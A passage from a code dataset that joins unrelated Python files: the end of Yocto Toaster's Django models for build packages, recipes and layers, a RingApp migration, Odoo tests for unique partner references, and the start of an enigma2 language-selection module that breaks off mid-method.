        (TYPE_RCONFLICTS, "conflicts"),
    )
    """ Indexed by dep_type, in view order, key for short name and help
        description which when viewed will be printf'd with the
        package name.
    """
    DEPENDS_DICT = {
        TYPE_RDEPENDS :     ("depends", "%s is required to run %s"),
        TYPE_TRDEPENDS :    ("depends", "%s is required to run %s"),
        TYPE_TRECOMMENDS :  ("recommends", "%s extends the usability of %s"),
        TYPE_RRECOMMENDS :  ("recommends", "%s extends the usability of %s"),
        TYPE_RSUGGESTS :    ("suggests", "%s is suggested for installation with %s"),
        TYPE_RPROVIDES :    ("provides", "%s is provided by %s"),
        TYPE_RREPLACES :    ("replaces", "%s is replaced by %s"),
        TYPE_RCONFLICTS :   ("conflicts", "%s conflicts with %s, which will not be installed if this package is not first removed"),
    }

    package = models.ForeignKey(Package, related_name='package_dependencies_source')
    depends_on = models.ForeignKey(Package, related_name='package_dependencies_target')   # soft dependency
    dep_type = models.IntegerField(choices=DEPENDS_TYPE)
    target = models.ForeignKey(Target, null=True)
    # manager excludes self-dependencies; see Package_DependencyManager
    objects = Package_DependencyManager()
class Target_Installed_Package(models.Model):
    """Join table recording that a Package is installed in a Target's image."""
    target = models.ForeignKey(Target)
    package = models.ForeignKey(Package, related_name='buildtargetlist_package')
class Package_File(models.Model):
    """A single file shipped inside a Package."""
    package = models.ForeignKey(Package, related_name='buildfilelist_package')
    path = models.FilePathField(max_length=255, blank=True)
    size = models.IntegerField()  # in bytes
class Recipe(models.Model):
    """A bitbake recipe, as provided by a particular Layer_Version."""
    search_allowed_fields = ['name', 'version', 'file_path', 'section',
                             'summary', 'description', 'license',
                             'layer_version__layer__name',
                             'layer_version__branch', 'layer_version__commit',
                             'layer_version__local_path',
                             'layer_version__layer_source']

    up_date = models.DateTimeField(null=True, default=None)  # last metadata update
    name = models.CharField(max_length=100, blank=True)
    version = models.CharField(max_length=100, blank=True)
    layer_version = models.ForeignKey('Layer_Version',
                                      related_name='recipe_layer_version')
    summary = models.TextField(blank=True)
    description = models.TextField(blank=True)
    section = models.CharField(max_length=100, blank=True)
    license = models.CharField(max_length=200, blank=True)
    homepage = models.URLField(blank=True)
    bugtracker = models.URLField(blank=True)
    file_path = models.FilePathField(max_length=255)
    pathflags = models.CharField(max_length=200, blank=True)
    is_image = models.BooleanField(default=False)

    def __unicode__(self):
        return "Recipe " + self.name + ":" + self.version

    def get_vcs_recipe_file_link_url(self):
        """Web link to this recipe file in its layer's VCS browser, or None."""
        return self.layer_version.get_vcs_file_link_url(self.file_path)

    def get_description_or_summary(self):
        """Prefer the long description; fall back to summary, then ''."""
        if self.description:
            return self.description
        elif self.summary:
            return self.summary
        else:
            return ""

    class Meta:
        unique_together = (("layer_version", "file_path", "pathflags"), )
class Recipe_DependencyManager(models.Manager):
    """Manager for Recipe_Dependency that hides self-referencing rows."""
    use_for_related_fields = True

    def get_queryset(self):
        # exclude dependencies of a recipe on itself
        return super(Recipe_DependencyManager, self).get_queryset().exclude(recipe_id = F('depends_on__id'))
class Provides(models.Model):
    """A name PROVIDES'd by a Recipe (used to resolve indirect dependencies)."""
    name = models.CharField(max_length=100)
    recipe = models.ForeignKey(Recipe)
class Recipe_Dependency(models.Model):
    """A build-time (DEPENDS) or runtime (RDEPENDS) edge between two Recipes."""
    TYPE_DEPENDS = 0
    TYPE_RDEPENDS = 1

    DEPENDS_TYPE = (
        (TYPE_DEPENDS, "depends"),
        (TYPE_RDEPENDS, "rdepends"),
    )
    recipe = models.ForeignKey(Recipe, related_name='r_dependencies_recipe')
    depends_on = models.ForeignKey(Recipe, related_name='r_dependencies_depends')
    # the Provides entry the dependency was resolved through, if indirect
    via = models.ForeignKey(Provides, null=True, default=None)
    dep_type = models.IntegerField(choices=DEPENDS_TYPE)
    # manager excludes self-dependencies; see Recipe_DependencyManager
    objects = Recipe_DependencyManager()
class Machine(models.Model):
    """A MACHINE configuration provided by a Layer_Version."""
    search_allowed_fields = ["name", "description", "layer_version__layer__name"]
    up_date = models.DateTimeField(null = True, default = None)  # last metadata update

    layer_version = models.ForeignKey('Layer_Version')
    name = models.CharField(max_length=255)
    description = models.CharField(max_length=255)

    def get_vcs_machine_file_link_url(self):
        """Web link to this machine's .conf file in the layer's VCS browser, or None."""
        path = 'conf/machine/'+self.name+'.conf'

        return self.layer_version.get_vcs_file_link_url(path)

    def __unicode__(self):
        return "Machine " + self.name + "(" + self.description + ")"
class BitbakeVersion(models.Model):
    """A named bitbake checkout (git URL + branch + subdirectory) usable by Releases."""
    name = models.CharField(max_length=32, unique = True)
    giturl = GitURLField()
    branch = models.CharField(max_length=32)
    dirpath = models.CharField(max_length=255)  # subdirectory within the checkout

    def __unicode__(self):
        return "%s (Branch: %s)" % (self.name, self.branch)
class Release(models.Model):
    """ A release is a project template, used to pre-populate Project settings with a configuration set """
    name = models.CharField(max_length=32, unique = True)
    description = models.CharField(max_length=255)
    bitbake_version = models.ForeignKey(BitbakeVersion)
    branch_name = models.CharField(max_length=50, default = "")
    helptext = models.TextField(null=True)  # HTML help shown in the UI, if any

    def __unicode__(self):
        return "%s (%s)" % (self.name, self.branch_name)

    def __str__(self):
        return self.name
class ReleaseDefaultLayer(models.Model):
    """A layer (by name) enabled by default for projects using a Release."""
    release = models.ForeignKey(Release)
    layer_name = models.CharField(max_length=100, default="")
class LayerSource(object):
    """ Where the layer metadata came from """
    TYPE_LOCAL = 0
    TYPE_LAYERINDEX = 1
    TYPE_IMPORTED = 2
    TYPE_BUILD = 3

    SOURCE_TYPE = (
        (TYPE_LOCAL, "local"),
        (TYPE_LAYERINDEX, "layerindex"),
        (TYPE_IMPORTED, "imported"),
        (TYPE_BUILD, "build"),
    )

    @staticmethod
    def types_dict():
        """ Turn the TYPES enums into a simple dictionary """
        # @staticmethod so the call also works on an instance; as a plain
        # function in the class body, instance calls would pass self as an
        # unexpected argument.
        # NOTE(review): the substring test also matches the SOURCE_TYPE
        # attribute itself, so the SOURCE_TYPE tuple ends up in the returned
        # dict too; preserved as-is for backwards compatibility.
        dictionary = {}
        for key in LayerSource.__dict__:
            if "TYPE" in key:
                dictionary[key] = getattr(LayerSource, key)
        return dictionary
class Layer(models.Model):
    """A bitbake layer (version-independent metadata; see Layer_Version for per-branch data)."""
    up_date = models.DateTimeField(null=True, default=timezone.now)  # last metadata update
    name = models.CharField(max_length=100)
    layer_index_url = models.URLField()
    vcs_url = GitURLField(default=None, null=True)
    # set instead of vcs_url when the layer lives in a local directory
    local_source_dir = models.TextField(null=True, default=None)
    # web-browser URLs for the layer repository; %branch%/%path% templates
    # are expanded by Layer_Version._handle_url_path()
    vcs_web_url = models.URLField(null=True, default=None)
    vcs_web_tree_base_url = models.URLField(null=True, default=None)
    vcs_web_file_base_url = models.URLField(null=True, default=None)
    summary = models.TextField(help_text='One-line description of the layer',
                               null=True, default=None)
    description = models.TextField(null=True, default=None)

    def __unicode__(self):
        return "%s / %s " % (self.name, self.summary)
class Layer_Version(models.Model):
    """
    A Layer_Version either belongs to a single project or no project
    """
    search_allowed_fields = ["layer__name", "layer__summary",
                             "layer__description", "layer__vcs_url",
                             "dirpath", "release__name", "commit", "branch"]

    build = models.ForeignKey(Build, related_name='layer_version_build',
                              default=None, null=True)

    layer = models.ForeignKey(Layer, related_name='layer_version_layer')

    layer_source = models.IntegerField(choices=LayerSource.SOURCE_TYPE,
                                       default=0)

    up_date = models.DateTimeField(null=True, default=timezone.now)  # last metadata update

    # To which metadata release does this layer version belong to
    release = models.ForeignKey(Release, null=True, default=None)

    branch = models.CharField(max_length=80)
    commit = models.CharField(max_length=100)
    # If the layer is in a subdir
    dirpath = models.CharField(max_length=255, null=True, default=None)

    # if -1, this is a default layer
    priority = models.IntegerField(default=0)

    # where this layer exists on the filesystem
    local_path = models.FilePathField(max_length=1024, default="/")

    # Set if this layer is restricted to a particular project
    project = models.ForeignKey('Project', null=True, default=None)

    # code lifted, with adaptations, from the layerindex-web application
    # https://git.yoctoproject.org/cgit/cgit.cgi/layerindex-web/
    def _handle_url_path(self, base_url, path):
        """
        Expand the %branch%/%path% templates in base_url with this layer
        version's release branch and dirpath + path; returns None when
        base_url is empty.

        NOTE(review): uses self.release.name for the branch, so this
        appears to assume release is set when a templated URL is used —
        confirm with callers.
        """
        import re, posixpath
        if base_url:
            if self.dirpath:
                if path:
                    extra_path = self.dirpath + '/' + path
                    # Normalise out ../ in path for usage URL
                    extra_path = posixpath.normpath(extra_path)
                    # Minor workaround to handle case where subdirectory has been added between branches
                    # (should probably support usage URL per branch to handle this... sigh...)
                    if extra_path.startswith('../'):
                        extra_path = extra_path[3:]
                else:
                    extra_path = self.dirpath
            else:
                extra_path = path
            branchname = self.release.name
            url = base_url.replace('%branch%', branchname)

            # If there's a % in the path (e.g. a wildcard bbappend) we need to encode it
            if extra_path:
                extra_path = extra_path.replace('%', '%25')

            if '%path%' in base_url:
                if extra_path:
                    url = re.sub(r'\[([^\]]*%path%[^\]]*)\]', '\\1', url)
                else:
                    url = re.sub(r'\[([^\]]*%path%[^\]]*)\]', '', url)
                return url.replace('%path%', extra_path)
            else:
                return url + extra_path
        return None

    def get_vcs_link_url(self):
        """Web link to the layer repository, or None if not configured."""
        if self.layer.vcs_web_url is None:
            return None
        return self.layer.vcs_web_url

    def get_vcs_file_link_url(self, file_path=""):
        """Web link to a file within this layer version, or None."""
        if self.layer.vcs_web_file_base_url is None:
            return None
        return self._handle_url_path(self.layer.vcs_web_file_base_url,
                                     file_path)

    def get_vcs_dirpath_link_url(self):
        """Web link to this layer version's subdirectory, or None."""
        if self.layer.vcs_web_tree_base_url is None:
            return None
        return self._handle_url_path(self.layer.vcs_web_tree_base_url, '')

    def get_vcs_reference(self):
        """Best available VCS reference: commit, then branch, then release name."""
        if self.commit is not None and len(self.commit) > 0:
            return self.commit
        if self.branch is not None and len(self.branch) > 0:
            return self.branch
        if self.release is not None:
            return self.release.name
        return 'N/A'

    def get_detailspage_url(self, project_id=None):
        """ returns the url to the layer details page uses own project
        field if project_id is not specified """
        if project_id is None:
            project_id = self.project.pk

        return reverse('layerdetails', args=(project_id, self.pk))

    def get_alldeps(self, project_id):
        """Get full list of unique layer dependencies."""
        def gen_layerdeps(lver, project, depth):
            if depth == 0:
                return
            for ldep in lver.dependencies.all():
                yield ldep.depends_on
                # get next level of deps recursively calling gen_layerdeps
                for subdep in gen_layerdeps(ldep.depends_on, project, depth-1):
                    yield subdep

        project = Project.objects.get(pk=project_id)
        result = []
        projectlvers = [player.layercommit for player in
                        project.projectlayer_set.all()]
        # protect against infinite layer dependency loops
        maxdepth = 20
        for dep in gen_layerdeps(self, project, maxdepth):
            # filter out duplicates and layers already belonging to the project
            if dep not in result + projectlvers:
                result.append(dep)

        return sorted(result, key=lambda x: x.layer.name)

    def __unicode__(self):
        return ("id %d belongs to layer: %s" % (self.pk, self.layer.name))

    def __str__(self):
        if self.release:
            release = self.release.name
        else:
            release = "No release set"

        return "%d %s (%s)" % (self.pk, self.layer.name, release)
class LayerVersionDependency(models.Model):
    """A dependency edge between two Layer_Versions."""
    layer_version = models.ForeignKey(Layer_Version,
                                      related_name="dependencies")
    depends_on = models.ForeignKey(Layer_Version,
                                   related_name="dependees")
class ProjectLayer(models.Model):
    """Associates a Layer_Version with a Project's configuration."""
    project = models.ForeignKey(Project)
    layercommit = models.ForeignKey(Layer_Version, null=True)
    optional = models.BooleanField(default = True)  # False for layers the release mandates

    def __unicode__(self):
        return "%s, %s" % (self.project.name, self.layercommit)

    class Meta:
        unique_together = (("project", "layercommit"),)
class CustomImageRecipe(Recipe):
    """
    An image recipe created by the user in Toaster, derived from an existing
    base image recipe with packages added (appends), removed (excludes) or
    carried over from the last good build (includes).
    """

    # CustomImageRecipe's belong to layers called:
    LAYER_NAME = "toaster-custom-images"

    search_allowed_fields = ['name']

    base_recipe = models.ForeignKey(Recipe, related_name='based_on_recipe')
    project = models.ForeignKey(Project)
    last_updated = models.DateTimeField(null=True, default=None)

    def get_last_successful_built_target(self):
        """ Return the last successful built target object if one exists
        otherwise return None """
        return Target.objects.filter(Q(build__outcome=Build.SUCCEEDED) &
                                     Q(build__project=self.project) &
                                     Q(target=self.name)).last()

    def update_package_list(self):
        """ Update the package list from the last good build of this
        CustomImageRecipe
        """
        # Check if we're already up-to-date or not
        target = self.get_last_successful_built_target()
        if target is None:
            # So we've never actually built this Custom recipe but what about
            # the recipe it's based on?
            target = \
                Target.objects.filter(Q(build__outcome=Build.SUCCEEDED) &
                                      Q(build__project=self.project) &
                                      Q(target=self.base_recipe.name)).last()
            if target is None:
                return

        if target.build.completed_on == self.last_updated:
            return

        self.includes_set.clear()

        excludes_list = self.excludes_set.values_list('name', flat=True)
        appends_list = self.appends_set.values_list('name', flat=True)

        built_packages_list = \
            target.target_installed_package_set.values_list('package__name',
                                                            flat=True)
        for built_package in built_packages_list:
            # Is the built package in the custom packages list?
            if built_package in excludes_list:
                continue

            if built_package in appends_list:
                continue

            cust_img_p = \
                    CustomImagePackage.objects.get(name=built_package)
            self.includes_set.add(cust_img_p)

        self.last_updated = target.build.completed_on
        self.save()

    def get_all_packages(self):
        """Get the included packages and any appended packages"""
        self.update_package_list()

        return CustomImagePackage.objects.filter((Q(recipe_appends=self) |
                                                  Q(recipe_includes=self)) &
                                                 ~Q(recipe_excludes=self))

    def get_base_recipe_file(self):
        """Get the base recipe file path if it exists on the file system"""
        path_schema_one = "%s/%s" % (self.base_recipe.layer_version.local_path,
                                     self.base_recipe.file_path)

        path_schema_two = self.base_recipe.file_path

        path_schema_three = "%s/%s" % (self.base_recipe.layer_version.layer.local_source_dir,
                                       self.base_recipe.file_path)

        if os.path.exists(path_schema_one):
            return path_schema_one

        # The path may now be the full path if the recipe has been built
        if os.path.exists(path_schema_two):
            return path_schema_two

        # Or a local path if all layers are local
        if os.path.exists(path_schema_three):
            return path_schema_three

        return None

    def generate_recipe_file_contents(self):
        """Generate the contents for the recipe file."""
        # If we have no excluded packages we only need to _append
        if self.excludes_set.count() == 0:
            packages_conf = "IMAGE_INSTALL_append = \" "

            for pkg in self.appends_set.all():
                packages_conf += pkg.name+' '
        else:
            packages_conf = "IMAGE_FEATURES =\"\"\nIMAGE_INSTALL = \""
            # We add all the known packages to be built by this recipe apart
            # from locale packages which are controlled with IMAGE_LINGUAS.
            for pkg in self.get_all_packages().exclude(
                    name__icontains="locale"):
                packages_conf += pkg.name+' '

        packages_conf += "\""

        base_recipe_path = self.get_base_recipe_file()
        if base_recipe_path:
            # read via a context manager so the file handle is closed
            # promptly rather than leaking until garbage collection
            with open(base_recipe_path, 'r') as base_recipe_file:
                base_recipe = base_recipe_file.read()
        else:
            # Pass back None to trigger error message to user
            return None

        # Add a special case for when the recipe we have based a custom image
        # recipe on requires another recipe.
        # For example:
        # "require core-image-minimal.bb" is changed to:
        # "require recipes-core/images/core-image-minimal.bb"
        req_search = re.search(r'(require\s+)(.+\.bb\s*$)',
                               base_recipe,
                               re.MULTILINE)
        if req_search:
            require_filename = req_search.group(2).strip()

            corrected_location = Recipe.objects.filter(
                Q(layer_version=self.base_recipe.layer_version) &
                Q(file_path__icontains=require_filename)).last().file_path

            new_require_line = "require %s" % corrected_location

            base_recipe = base_recipe.replace(req_search.group(0),
                                              new_require_line)

        info = {
            "date": timezone.now().strftime("%Y-%m-%d %H:%M:%S"),
            "base_recipe": base_recipe,
            "recipe_name": self.name,
            "base_recipe_name": self.base_recipe.name,
            "license": self.license,
            "summary": self.summary,
            "description": self.description,
            "packages_conf": packages_conf.strip()
        }

        recipe_contents = ("# Original recipe %(base_recipe_name)s \n"
                           "%(base_recipe)s\n\n"
                           "# Recipe %(recipe_name)s \n"
                           "# Customisation Generated by Toaster on %(date)s\n"
                           "SUMMARY = \"%(summary)s\"\n"
                           "DESCRIPTION = \"%(description)s\"\n"
                           "LICENSE = \"%(license)s\"\n"
                           "%(packages_conf)s") % info

        return recipe_contents
class ProjectVariable(models.Model):
    """A bitbake variable value configured on a Project (pre-build)."""
    project = models.ForeignKey(Project)
    name = models.CharField(max_length=100)
    value = models.TextField(blank = True)
class Variable(models.Model):
    """A bitbake variable value captured from a completed Build."""
    search_allowed_fields = ['variable_name', 'variable_value',
                             'vhistory__file_name', "description"]
    build = models.ForeignKey(Build, related_name='variable_build')
    variable_name = models.CharField(max_length=100)
    variable_value = models.TextField(blank=True)
    changed = models.BooleanField(default=False)  # True if changed from the default
    human_readable_name = models.CharField(max_length=200)
    description = models.TextField(blank=True)
class VariableHistory(models.Model):
    """One step in a Variable's history: which file/line set or modified it, and how."""
    variable = models.ForeignKey(Variable, related_name='vhistory')
    value = models.TextField(blank=True)
    file_name = models.FilePathField(max_length=255)
    line_number = models.IntegerField(null=True)
    operation = models.CharField(max_length=64)  # e.g. "set", "append", "prepend"
class HelpText(models.Model):
    """Help text captured from bitbake for an entity (currently only variables) of a Build."""
    VARIABLE = 0
    HELPTEXT_AREA = ((VARIABLE, 'variable'), )

    build = models.ForeignKey(Build, related_name='helptext_build')
    area = models.IntegerField(choices=HELPTEXT_AREA)
    key = models.CharField(max_length=100)  # e.g. the variable name
    text = models.TextField()
class LogMessage(models.Model):
    """A log message recorded during a build, or a Toaster-internal exception."""
    EXCEPTION = -1      # used to signal self-toaster-exceptions
    INFO = 0
    WARNING = 1
    ERROR = 2
    CRITICAL = 3

    LOG_LEVEL = (
        (INFO, "info"),
        (WARNING, "warn"),
        (ERROR, "error"),
        (CRITICAL, "critical"),
        (EXCEPTION, "toaster exception")
    )

    build = models.ForeignKey(Build)
    task = models.ForeignKey(Task, blank = True, null=True)
    level = models.IntegerField(choices=LOG_LEVEL, default=INFO)
    message = models.TextField(blank=True, null=True)
    pathname = models.FilePathField(max_length=255, blank=True)
    lineno = models.IntegerField(null=True)

    def __str__(self):
        # __str__ must return str on Python 3; the previous force_bytes()
        # wrapper returned bytes, which makes str(obj) raise TypeError
        return '%s %s %s' % (self.get_level_display(), self.message, self.build)
def invalidate_cache(**kwargs):
    """Signal handler: drop the whole Django cache after any model change."""
    # Imported lazily so the configured cache backend is resolved at call time.
    from django.core.cache import cache
    try:
        cache.clear()
    except Exception as exc:
        message = "Problem with cache backend: Failed to clear cache: %s" % exc
        logger.warning(message)
def signal_runbuilds():
    """Send SIGUSR1 to runbuilds process"""
    pid_path = os.path.join(os.getenv('BUILDDIR', '.'), '.runbuilds.pid')
    try:
        with open(pid_path) as pid_file:
            runbuilds_pid = int(pid_file.read())
        os.kill(runbuilds_pid, SIGUSR1)
    except FileNotFoundError:
        # No pid file means no runbuilds daemon is running; nothing to signal.
        logger.info("Stopping existing runbuilds: no current process found")
class Distro(models.Model):
    """A distro configuration (conf/distro/*.conf) provided by a layer version."""
    search_allowed_fields = ["name", "description", "layer_version__layer__name"]
    up_date = models.DateTimeField(null = True, default = None)
    layer_version = models.ForeignKey('Layer_Version')
    name = models.CharField(max_length=255)
    description = models.CharField(max_length=255)
    def get_vcs_distro_file_link_url(self):
        """Return the web VCS URL of this distro's .conf file inside its layer."""
        path = 'conf/distro/%s.conf' % self.name
        return self.layer_version.get_vcs_file_link_url(path)
    def __unicode__(self):
        # Python 2 style display method (this codebase predates __str__-only).
        return "Distro " + self.name + "(" + self.description + ")"
# Invalidate the whole Django cache whenever any model row is saved or
# deleted, or an m2m relation changes, so cached views never go stale.
django.db.models.signals.post_save.connect(invalidate_cache)
django.db.models.signals.post_delete.connect(invalidate_cache)
django.db.models.signals.m2m_changed.connect(invalidate_cache)
| schleichdi2/OPENNFR-6.3-CORE | bitbake/lib/toaster/orm/models.py | Python | gpl-2.0 | 69,776 |
# -*- coding: utf-8 -*-
# Generated by Django 1.9.4 on 2017-09-06 22:08
from __future__ import unicode_literals
import datetime
from django.db import migrations, models
from django.utils.timezone import utc
class Migration(migrations.Migration):
    """Add category, timestamp and title columns to the News model."""

    dependencies = [
        ('ringapp', '0039_auto_20170216_1220'),
    ]

    operations = [
        migrations.AddField(
            model_name='news',
            name='category',
            field=models.CharField(blank=True, max_length=64, null=True),
        ),
        migrations.AddField(
            model_name='news',
            name='timestamp',
            # The one-off default (the migration's generation time) only
            # backfills existing rows; auto_now_add takes over afterwards,
            # hence preserve_default=False.
            field=models.DateTimeField(auto_now_add=True, default=datetime.datetime(2017, 9, 6, 22, 8, 57, 719011, tzinfo=utc)),
            preserve_default=False,
        ),
        migrations.AddField(
            model_name='news',
            name='title',
            field=models.CharField(blank=True, max_length=64, null=True),
        ),
    ]
| rschwiebert/RingApp | ringapp/migrations/0040_auto_20170906_2208.py | Python | mit | 962 |
# Copyright 2017 Tecnativa - Vicent Cubells
# Copyright 2020 Tecnativa - João Marques
# Copyright 2020 Tecnativa - Pedro M. Baeza
# License AGPL-3.0 or later (http://www.gnu.org/licenses/agpl.html).
from odoo.exceptions import ValidationError
from odoo.tests import common
class TestResPartnerRefUnique(common.SavepointCase):
    """Tests for the res.partner unique-internal-reference constraint.

    The constraint mode is driven by company.partner_ref_unique:
    'none' (off), 'companies' (only is_company partners) or 'all'.
    """

    @classmethod
    def setUpClass(cls):
        super(TestResPartnerRefUnique, cls).setUpClass()
        cls.partner_obj = cls.env["res.partner"]
        cls.company_obj = cls.env["res.company"]
        # look for possible already duplicated refs for being resilient
        cls.partner_obj.search([("ref", "!=", False)]).write({"ref": False})
        cls.company = cls.company_obj.create({"name": "Test company"})
        cls.env.user.write(
            {"company_id": cls.company.id, "company_ids": cls.company.ids}
        )
        cls.partner1 = cls.partner_obj.create({"name": "Partner1", "company_id": False})
        cls.partner2 = cls.partner_obj.create({"name": "Partner2", "company_id": False})

    def test_check_ref_company(self):
        """'all' mode rejects duplicate refs, including across company scopes."""
        (self.partner1 + self.partner2).write({"company_id": self.company.id})
        # Test that we can create/modify partners with same ref in current situation
        self.partner1.ref = "same_ref"
        partner = self.partner_obj.create({"name": "other", "ref": "same_ref"})
        # Try to activate restriction
        with self.assertRaises(ValidationError):
            self.company.partner_ref_unique = "all"
        # Let the situation without duplicate refs and apply global condition
        partner.unlink()
        self.company.partner_ref_unique = "all"
        with self.assertRaises(ValidationError):
            self.partner2.ref = "same_ref"
        with self.assertRaises(ValidationError):
            self.partner_obj.create(
                {"name": "other", "ref": "same_ref", "company_id": self.company.id}
            )
        # This one should also raise the constraint as the no-company contact
        # collapses with the company specific contact
        with self.assertRaises(ValidationError):
            self.partner_obj.create(
                {"name": "other", "ref": "same_ref", "company_id": False}
            )

    def test_partner1_wo_company_new_partner_w_company(self):
        """A shared (no-company) ref blocks a company-scoped duplicate."""
        self.company.partner_ref_unique = "all"
        self.partner1.write({"company_id": False, "ref": "same_ref"})
        with self.assertRaises(ValidationError):
            self.partner_obj.create(
                {"name": "other", "ref": "same_ref", "company_id": self.company.id}
            )
        self.partner1.unlink()

    def test_partner1_w_company_new_partner_wo_company(self):
        """A company-scoped ref blocks a shared (no-company) duplicate."""
        self.company.partner_ref_unique = "all"
        self.partner1.ref = "same_ref"
        with self.assertRaises(ValidationError):
            self.partner_obj.create(
                {"name": "other", "ref": "same_ref", "company_id": False}
            )
        self.partner1.unlink()

    def test_check_ref_companies(self):
        """'companies' mode only constrains partners flagged is_company."""
        self.company.partner_ref_unique = (
            "none"  # Ensure no constraint is applied at beginning
        )
        self.partner1.is_company = True
        self.partner2.is_company = True
        # Test that we can create/modify company partners
        # with same ref in current situation
        self.partner1.ref = "same_ref"
        partner3 = self.partner_obj.create(
            {"name": "Company3", "ref": "same_ref", "is_company": True}
        )
        # Try to activate restriction
        with self.assertRaises(ValidationError):
            self.company.partner_ref_unique = "companies"
        # Let the situation without duplicate refs and apply global condition
        partner3.unlink()
        self.company.partner_ref_unique = "companies"
        with self.assertRaises(ValidationError):
            self.partner2.ref = "same_ref"
        with self.assertRaises(ValidationError):
            self.partner_obj.create(
                {"is_company": True, "name": "other", "ref": "same_ref"}
            )
        # Here there shouldn't be any problem
        self.partner_obj.create(
            {"is_company": False, "name": "other", "ref": "same_ref"}
        )

    def test_merge(self):
        """Merging two partners must not trip the uniqueness constraint."""
        self.company.partner_ref_unique = "all"
        self.partner1.ref = "same_ref"
        wizard = self.env["base.partner.merge.automatic.wizard"].create(
            {
                "partner_ids": [(4, self.partner1.id), (4, self.partner2.id)],
                "dst_partner_id": self.partner2.id,
                "state": "selection",
            }
        )
        # this shouldn't raise error
        wizard.action_merge()
| OCA/partner-contact | partner_ref_unique/tests/test_res_partner_ref.py | Python | agpl-3.0 | 4,681 |
# -*- coding: UTF-8 -*-
import gettext
import locale
import os
from Tools.Directories import SCOPE_LANGUAGE, resolveFilename
from time import time, localtime, strftime
# Root directory that contains the installed enigma2 locale subdirectories.
LPATH = resolveFilename(SCOPE_LANGUAGE, "")
# Prefix of the opkg packages that ship the individual locales.
Lpackagename = "enigma2-locale-"
class Language:
def __init__(self):
gettext.install('enigma2', resolveFilename(SCOPE_LANGUAGE, ""), unicode=0, codeset="utf-8")
gettext.bindtextdomain("enigma2", resolveFilename(SCOPE_LANGUAGE))
gettext.textdomain("enigma2")
self.activeLanguage = 0
self.catalog = None
self.lang = {}
self.InitLang()
self.callbacks = []
def InitLang(self):
self.langlist = []
self.langlistselection = []
self.ll = os.listdir(LPATH)
# FIXME make list dynamically
# name, iso-639 language, iso-3166 country. Please don't mix language&country!
self.addLanguage("English (US)", "en", "US", "ISO-8859-15")
self.addLanguage("Deutsch", "de", "DE", "ISO-8859-15")
self.addLanguage("Arabic", "ar", "AE", "ISO-8859-15")
self.addLanguage("Български", "bg", "BG", "ISO-8859-15")
self.addLanguage("Català", "ca", "AD", "ISO-8859-15")
self.addLanguage("Česky", "cs", "CZ", "ISO-8859-15")
self.addLanguage("Dansk", "da", "DK", "ISO-8859-15")
self.addLanguage("Ελληνικά", "el", "GR", "ISO-8859-7")
self.addLanguage("English (UK)", "en", "GB", "ISO-8859-15")
self.addLanguage("Español", "es", "ES", "ISO-8859-15")
self.addLanguage("Eesti", "et", "EE", "ISO-8859-15")
self.addLanguage("Persian", "fa", "IR", "ISO-8859-15")
self.addLanguage("Suomi", "fi", "FI", "ISO-8859-15")
self.addLanguage("Français", "fr", "FR", "ISO-8859-15")
self.addLanguage("Frysk", "fy", "NL", "ISO-8859-15")
self.addLanguage("Hebrew", "he", "IL", "ISO-8859-15")
self.addLanguage("Hrvatski", "hr", "HR", "ISO-8859-15")
self.addLanguage("Magyar", "hu", "HU", "ISO-8859-15")
self.addLanguage("Íslenska", "is", "IS", "ISO-8859-15")
self.addLanguage("Italiano", "it", "IT", "ISO-8859-15")
self.addLanguage("Kurdish", "ku", "KU", "ISO-8859-15")
self.addLanguage("Lietuvių", "lt", "LT", "ISO-8859-15")
self.addLanguage("Latviešu", "lv", "LV", "ISO-8859-15")
self.addLanguage("Nederlands", "nl", "NL", "ISO-8859-15")
self.addLanguage("Norsk Bokmål","nb", "NO", "ISO-8859-15")
self.addLanguage("Norsk", "no", "NO", "ISO-8859-15")
self.addLanguage("Polski", "pl", "PL", "ISO-8859-15")
self.addLanguage("Português", "pt", "PT", "ISO-8859-15")
self.addLanguage("Português do Brasil", "pt", "BR", "ISO-8859-15")
self.addLanguage("Romanian", "ro", "RO", "ISO-8859-15")
self.addLanguage("Русский", "ru", "RU", "ISO-8859-15")
self.addLanguage("Slovensky", "sk", "SK", "ISO-8859-15")
self.addLanguage("Slovenščina", "sl", "SI", "ISO-8859-15")
self.addLanguage("Srpski", "sr", "YU", "ISO-8859-15")
self.addLanguage("Svenska", "sv", "SE", "ISO-8859-15")
self.addLanguage("ภาษาไทย", "th", "TH", "ISO-8859-15")
self.addLanguage("Türkçe", "tr", "TR", "ISO-8859-15")
self.addLanguage("Ukrainian", "uk", "UA", "ISO-8859-15")
def addLanguage(self, name, lang, country, encoding):
try:
if lang in self.ll:
if country == "GB" or country == "BR":
if (lang + "_" + country) in self.ll:
self.lang[str(lang + "_" + country)] = ((name, lang, country, encoding))
self.langlist.append(str(lang + "_" + country))
else:
self.lang[str(lang + "_" + country)] = ((name, lang, country, encoding))
self.langlist.append(str(lang + "_" + country))
except:
print "Language " + str(name) + " not found"
self.langlistselection.append((str(lang + "_" + country), name))
def activateLanguage(self, index):
try:
lang = self.lang[index]
print "Activating language " + lang[0]
self.catalog = gettext.translation('enigma2', resolveFilename(SCOPE_LANGUAGE, ""), languages=[index], fallback=True)
self.catalog.install(names=("ngettext", "pgettext"))
self.activeLanguage = index
for x in self.callbacks:
if x:
x()
except:
print "Selected language does not exist!"
# NOTE: we do not use LC_ALL, because LC_ALL will not set any of the categories, when one of the categories fails.
# We'd rather try to set all available categories, and ignore the others
for category in [locale.LC_CTYPE, locale.LC_COLLATE, locale.LC_TIME, locale.LC_MONETARY, locale.LC_MESSAGES, locale.LC_NUMERIC]:
try:
locale.setlocale(category, (self.getLanguage(), 'UTF-8'))
except:
pass
# HACK: sometimes python 2.7 reverts to the LC_TIME environment value, so make sure it has the correct value
os.environ["LC_TIME"] = self.getLanguage() + '.UTF-8'
os.environ["LANGUAGE"] = self.getLanguage() + '.UTF-8'
os.environ["GST_SUBTITLE_ENCODING"] = self.getGStreamerSubtitleEncoding()
def activateLanguageIndex(self, index):
if index < len(self.langlist):
self.activateLanguage(self.langlist[index])
def getLanguageList(self):
return [ (x, self.lang[x]) for x in self.langlist ]
def getLanguageListSelection(self):
return self.langlistselection
def getActiveLanguage(self):
return self.activeLanguage
def getActiveCatalog(self):
return self.catalog
def getActiveLanguageIndex(self):
idx = 0
for x in self.langlist:
if x == self.activeLanguage:
return idx
idx += 1
return None
def getLanguage(self):
try:
return str(self.lang[self.activeLanguage][1]) + "_" + str(self.lang[self.activeLanguage][2])
except:
return ''
def getGStreamerSubtitleEncoding(self):
try:
return str(self.lang[self.activeLanguage][3])
except:
return 'ISO-8859-15'
def addCallback(self, callback):
